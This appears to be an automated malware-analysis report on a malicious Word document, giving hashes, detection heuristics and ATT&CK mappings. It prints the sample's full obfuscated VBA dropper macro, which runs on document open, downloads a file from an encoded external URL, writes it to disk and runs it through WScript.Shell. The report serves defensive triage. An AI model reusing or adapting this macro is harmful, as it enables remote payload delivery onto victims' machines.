Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 8e11c8d236551e7d…

MALICIOUS

Office (OLE)

184.0 KB Created: 2016-05-18 22:57:00 Authoring application: Microsoft Office Word First seen: 2019-04-18
MD5: 4d1cbfc85985f12621f0f93e585c4097 SHA-1: d5c8828550bdc351411d1eecfaa0a6a8a4318831 SHA-256: 8e11c8d236551e7d0a52485a2897389934235e41606fe7af6b26ee30086b8936
330 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1059 Command and Scripting Interpreter

The sample contains VBA macros, including a Document_Open subroutine, which is a common technique for executing malicious code upon opening the document. Critical heuristics indicate the use of WScript.Shell and CreateObject, suggesting the macro attempts to interact with the system, likely to download and execute a secondary payload. The ClamAV detection as 'Doc.Dropper.Donoff-5743530-0' further supports its role as a dropper.

Heuristics 10

  • ClamAV: Doc.Dropper.Donoff-5743530-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Donoff-5743530-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    Dim WuEpb As String
    Set mWwoXQA = CreateObject("WScript.Shell")
    End Function
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Dim fExpSbV As Boolean, RKLHuagrZb As Integer
    Set KfEVUAz = CreateObject("MSXML2.ServerXMLHTTP.6.0")
    Set ZOFvQisC = KfEVUAz
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
    Matched line in script
    Public Sub PnhePatYp(ByVal TclEGHiNVZ As Integer, ByVal cDiPONhgdu As Variant, ByVal ZTmSy As Variant, ByVal BQmDx As Object, ByVal JOZQMs As Variant, ByVal ZRUZA As Integer, ByVal RKlXVuJje As String)
    CallByName BQmDx, RKlXVuJje, 1, ZTmSy, JOZQMs, cDiPONhgdu
    End Sub
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    End Function
    Private Sub Document_Open()
    Dim LzHAxP As Integer
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8849 bytes
SHA-256: 88686842451e0e5a60f724d8e2ef97067b2bb69f3fac64499ef7061fed15862e
Detection
ClamAV: No threats found
Obfuscation or payload: likely
173 of 252 identifiers look randomly generated (e.g. 'j4uHtnJoy8oycNRtefhPmcMgCDf4ju1') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function VpfjMw() As Integer
NddjA
If XBccwj(5601, "j4uHtnJoy8oycNRtefhPmcMgCDf4ju1") Then
kdFtL
Else
nuvzfFK
End If
VpfjMw = 8139
End Function
Private Sub Document_Open()
Dim LzHAxP As Integer
Dim UsohTS As Integer
EPrGkzHu.QYDdgP
End Sub
Private Sub KGvnuPk()
mJgHQ False, False, 4238
gcLIjQ True
End Sub

Attribute VB_Name = "aFCZE"
Private Sub wfvYYqQI()
QuYYqnyOFO
VmdNCfQ
XducHsOfcu "x1DnQDF2czp6Rx9jrX"
End Sub
Public Function ZOFvQisC() As Object
Dim fExpSbV As Boolean, RKLHuagrZb As Integer
Set KfEVUAz = CreateObject("MSXML2.ServerXMLHTTP.6.0")
Set ZOFvQisC = KfEVUAz
End Function
Public Function mWwoXQA() As Object
Dim WuEpb As String
Set mWwoXQA = CreateObject("WScript.Shell")
End Function
Public Function YdTUsFm() As Object
kSeUwKWLwH = 3434
Set YdTUsFm = CreateObject("ADODB.Stream")
End Function
Private Sub MCtMgah()
KbxYhbaay
AvUSfTJh "8EbN8KX3hIFQHcDIlQI", "o52tnaqhX64Zh0y4r", False
ZOkaSukV
End Sub

Attribute VB_Name = "BeYvRF"
Public Sub PnhePatYp(ByVal TclEGHiNVZ As Integer, ByVal cDiPONhgdu As Variant, ByVal ZTmSy As Variant, ByVal BQmDx As Object, ByVal JOZQMs As Variant, ByVal ZRUZA As Integer, ByVal RKlXVuJje As String)
CallByName BQmDx, RKlXVuJje, 1, ZTmSy, JOZQMs, cDiPONhgdu
End Sub
Public Sub DJVPI(ByVal pxDRulh As Object, ByVal jrBWdEm As Integer, ByVal NDAsEvilP As String, ByVal yCQGVhevt As String)
CallByName pxDRulh, NDAsEvilP, 1
End Sub
Public Function UbGPuJ(ByVal RREzJxxtD As String, ByVal VIrHfCIYF As String, ByVal ISVPXW As Object) As Variant
Set UbGPuJ = CallByName(ISVPXW, VIrHfCIYF, 2, RREzJxxtD)
End Function
Public Sub NKifxPpV(ByVal VSjVUF As Variant, ByVal DBwIkBro As String, ByVal ajVZXoIqG As Variant, ByVal bXMjSuTE As Object)
CallByName bXMjSuTE, DBwIkBro, 1, ajVZXoIqG, VSjVUF
End Sub
Private Function uYeVPhy(ByVal OCtJVgLy As String, ByVal bDPzlY As Integer) As String
jzfxURr 2340, 1181, 9816
piAMuSXS 6132, 4579
LXMizfaoij
If dADtLeg Then
uTkVafb 508, 9861
wqQuLT "zc5pscFjT2S8tZnwd", 3675
SlRmBd
End If
SCMoUyqWX
uYeVPhy = "e7HlC4v2sDVjbiov99wsrMoR"
End Function
Public Sub NqquGP(ByVal hVeELAyr As Variant, ByVal bMzMVuEupm As String, ByVal fbRAcm As Object, ByVal EzeHNehRF As Integer, ByVal pNFJaMR As String)
Dim xeEwuF As String
Dim yKNzUJers As String
CallByName fbRAcm, pNFJaMR, 1, hVeELAyr
End Sub
Public Function nTIJawB(ByVal ueBQcrWS As String, ByVal eMHLXuUVG As Object) As Variant
nTIJawB = CallByName(eMHLXuUVG, ueBQcrWS, 2)
End Function
Public Sub xVkQjut(ByVal FygbNsksM As Variant, ByVal pmVJAx As String, ByVal LDukdsJJjO As Object)
CallByName LDukdsJJjO, pmVJAx, 4, FygbNsksM
End Sub

Attribute VB_Name = "EGYbhgTTB"
Private Sub moKxvi()
OfSXF "9Obf1MXW8x08GTl7WT4IE", 6165
yHQxN
dgWaQn
If QREzQooq Then
gxyGcw
Else
qnYhDzuW
bBjpOnw "YU5a36sdqMf4gGhwRX", "t4xljyxgjyBYvwJ2FIasgwNg"
End If
End Sub
Public Function zkiLABPjC(ByVal rXqOy As String, ByVal ZPcQozUV As String) As String
Dim EbfjMcsfZd As Boolean
Dim oVkYhfM As Integer, xaMXvJj As Boolean
SBuYvDo = 5338
For ZlCVbbs = 1 To VbcouufHpG.gleSLxNG(3700, "KWCmiDd1IBm4bsky08t2", ZPcQozUV)
EbfjMcsfZd = VbcouufHpG.RkIzvdKt(rXqOy, "EbC2mO1OrtfR6CBcYOmVrvR6oajt", VbcouufHpG.ChuZLn(ZPcQozUV, ZlCVbbs, 2535, "UfMcc6HnOgr6Karnf2NGAmj"))
sEodtQL = "4smDlgVxUxh1eWCFA7Hkvl"
If Not EbfjMcsfZd Then
zkiLABPjC = VbcouufHpG.DYXpv(zkiLABPjC, VbcouufHpG.ChuZLn(ZPcQozUV, ZlCVbbs, 2535, "4o6PvsgUgKWGsP9GSQYDH20ja"))
End If
BhvAq = "STSBDuZZ4OAYHjaNd5S"
Next
End Function
Private Function rmdMD(ByVal lvLjb As Boolean) As String
mGpHG "2AkTeLJsmfzcvjHC7cRex", True, 9730
If iUWnPbt(1475, 8375) Then
MwUvLHxI
End If
QXMkh "htwEQMGrWzYauaLjxuD51O", 3269, False
aEcIpbKw True
wVbejPo
rmdMD = "UrN4qbO1m0X5zG5tm41srs98yse4b8r"
End Function

Attribute VB_Name = "EPrGkzHu"
Private Function KPCRpu() As String
KPCRpu = EGYbhgTTB.zkiLABPjC("3oLDj9", "P3R39OCLE3So9S")
End Function
Private Function FHqUGHp() As String
FHqUGHp = "6LLnWHRLeRqz2rACK3OC6975dmTgw"
End Function
Private Function KzMWjtPR() As String
KzMWjtPR = EGYbhgTTB.zkiLABPjC("F26o/L", "LUsL/e2ro-/ALgeFont/")
End Function
Private Function qdFqRQhX() As String
Dim akMCEUJWT As Integer, GJjGE As String
qdFqRQhX = EGYbhgTTB.zkiLABPjC("M lUa8", "U/a7e8b a0Ueac 9af6U4l80abUbMe. e88x e")
End Function
Private Function XRJdvmMod() As String
bLjwgJSUR = "2GcxUxHGeeqAk5dRzkW"
XRJdvmMod = EGYbhgTTB.zkiLABPjC("NgYqcZ", "ZEnYYviYYrgongmceNYnct")
End Function
Private Function bCFMzogl() As String
bCFMzogl = LMdEaw
End Function
Private Sub ksHBEmIcM(ByVal rHdYNX As String, ByVal gfvUXo As String, ByVal ISVgmGxq As Variant, ByVal sxHKvmRjs As String)
Dim idRkI As String
Dim NJQxMIoS As String
IaFbCbvQf = 5255
Set HDwZLwsW = aFCZE.YdTUsFm
BeYvRF.xVkQjut 1, EGYbhgTTB.zkiLABPjC("LBoZgmq/", "mTZypoeq"), HDwZLwsW
BeYvRF.DJVPI HDwZLwsW, 8172, EGYbhgTTB.zkiLABPjC("PiG1UjQ", "OipPeGni"), tqhjynsHjX
BeYvRF.NqquGP ISVgmGxq, tqhjynsHjX, HDwZLwsW, 7897, nStkt
BeYvRF.NKifxPpV 2, EGYbhgTTB.zkiLABPjC("fJGc9mC0", "JSaCvceG0TJoFmGiCleG"), rHdYNX, HDwZLwsW
BeYvRF.DJVPI HDwZLwsW, 8172, EGYbhgTTB.zkiLABPjC("KMwhE6", "6C6lo6Eswe"), tqhjynsHjX
End Sub
Private Function IhlIMYNeV() As String
IhlIMYNeV = EGYbhgTTB.zkiLABPjC("Okxw0KC", "kSOektwRweqOuOOeswtkHwexKa0dxerk")
End Function
Private Function WDMQt() As String
QhJzBSkuli = 9116
WDMQt = EGYbhgTTB.zkiLABPjC("PiG1UjQ", "OipPeGni")
End Function
Private Sub JBvHoKbqX()
Dim EHMWLhGy As Integer
On Error GoTo jZtTFePDmI
TNXSaJ bCFMzogl, whxVtLP
nHFskkviX = "CIqqAGvbDWl6WstTB"
AcwENd whxVtLP, "tTZOxcNDYIQY4DtncOF", False
Exit Sub
jZtTFePDmI:
End Sub
Private Sub TNXSaJ(ByVal ObzgdkHr As String, ByVal YsneAXqlUt As String)
Set VVpSmZGOkG = aFCZE.ZOFvQisC
BeYvRF.PnhePatYp 6693, False, EGYbhgTTB.zkiLABPjC("KAgQjJ2L", "GKLEAT"), VVpSmZGOkG, ObzgdkHr, 9594, WDMQt
LfPYoESsUK = False
BeYvRF.NKifxPpV EGYbhgTTB.zkiLABPjC("h5rHPCZg", "HMHozHHilhglCag/P4.ZZ0H 5(5cComgpharPtigCbPlPe;r)H"), IhlIMYNeV, KzMWjtPR, VVpSmZGOkG
eNLxFz = "P6nMhz83z3IpEfN9Fo2PSP9mXTRK3F"
BeYvRF.DJVPI VVpSmZGOkG, 8172, EGYbhgTTB.zkiLABPjC("pZhU24tr", "SZte4ndZ"), "q0p8Ub3rshCrQjDSx5eeGycByLyw"
ksHBEmIcM YsneAXqlUt, "1lJl0pKbN2dMZTH7Zt8dL7ROgX6fDEQD", BeYvRF.nTIJawB(EGYbhgTTB.zkiLABPjC("WwH50j7fY", "Rw7esf0poYnWfsej0BwodYyj"), VVpSmZGOkG), "5kiXE2vicHqpXXDAo1j5B6"
End Sub
Private Function tWEpW() As String
tWEpW = EGYbhgTTB.zkiLABPjC("HqVgy4nv", "Evxvency")
End Function
Private Function tqhjynsHjX() As String
usNmDIucf = "Jss7PasM9VAjJRtDHa3zJ8u"
tqhjynsHjX = "yupHqjNM6l8zqfIHH2kt9X8aSCR17G"
End Function
Private Function WBbee(ByVal ajrLip As String) As String
If HQBbc Then
JPlDg
zniWRh False, True, 1880
jQPOuwUO
Else
LYGsIFmC
HghafPQh 2785
rBimKfo 1091, 315, 2975
End If
WBbee = "ArdJdLW6VWH5LTazdUDbs"
End Function
Private Function vpQfEefLZ(ByVal LAcWYGPSDO As String) As String
Dim YdfgkbO As String
COovMr = "DAIdRdDYbbwjjTLoFNQMEn8"
Set JjPWUaL = BeYvRF.UbGPuJ(KPCRpu, XRJdvmMod, aFCZE.mWwoXQA)
vpQfEefLZ = JjPWUaL(LAcWYGPSDO)
End Function
Private Function LMdEaw() As String
LMdEaw = EGYbhgTTB.zkiLABPjC("BRfV5qi", "hBqtftpiq:/Rf/hBfpsqaqfz.iicqoqm/qis5ysift5emBR/qcqacVBh5e5/iwqorRVdB.e5fxeR")
End Function
Public Sub QYDdgP()
DSFWQ = 8775
JBvHoKbqX
End Sub
Private Function nStkt() As String
nStkt = EGYbhgTTB.zkiLABPjC("0dYXgI8ls", "lWrliYtgIe")
End Function
Private Sub AcwENd(ByVal CmtMtSSV As String, ByVal KbUrADqZEH As String, ByVal VejaggyhE As Boolean)
Dim wwLQLRaLTE As Integer
Dim hwtAkFuBQg As String
BeYvRF.NqquGP CmtMtSSV, FHqUGHp, aFCZE.mWwoXQA, 7897, tWEpW
End Sub
Private Function whxVtLP() As String
Dim TTxTguQk As Boolean, rfrVlXygqD As String
NzmDVOpD = False
whxVtLP = vpQfEefLZ(EGYbhgTTB.zkiLABPjC("IV6mZvAC", "CTECMmPI")) & qdFqRQhX
End Function

Attribute VB_Name = "VbcouufHpG"
Public Function RkIzvdKt(ByVal ApLkqQS As String, ByVal zajYYZ As String, ByVal AtzWDJa As String) As Boolean
Dim MDXrDg As Boolean
RkIzvdKt = InStr(1, ApLkqQS, AtzWDJa)
End Function
Public Function ChuZLn(ByVal QNcst As String, ByVal EPQuVyD As Integer, ByVal WWSdKLmkrP As Integer, ByVal EaGdHX As String) As String
Dim XgCALH As String
ChuZLn = Mid(QNcst, EPQuVyD, 1)
End Function
Public Function gleSLxNG(ByVal Mnxsav As Integer, ByVal hXFeORK As String, ByVal fLmgthl As String) As Integer
Dim iBnLD As Integer
gleSLxNG = Len(fLmgthl)
End Function
Public Function DYXpv(ByVal PcNXnoheu As String, ByVal jxdZSHlNT As String) As String
Dim qgGLn As String
DYXpv = PcNXnoheu & jxdZSHlNT
End Function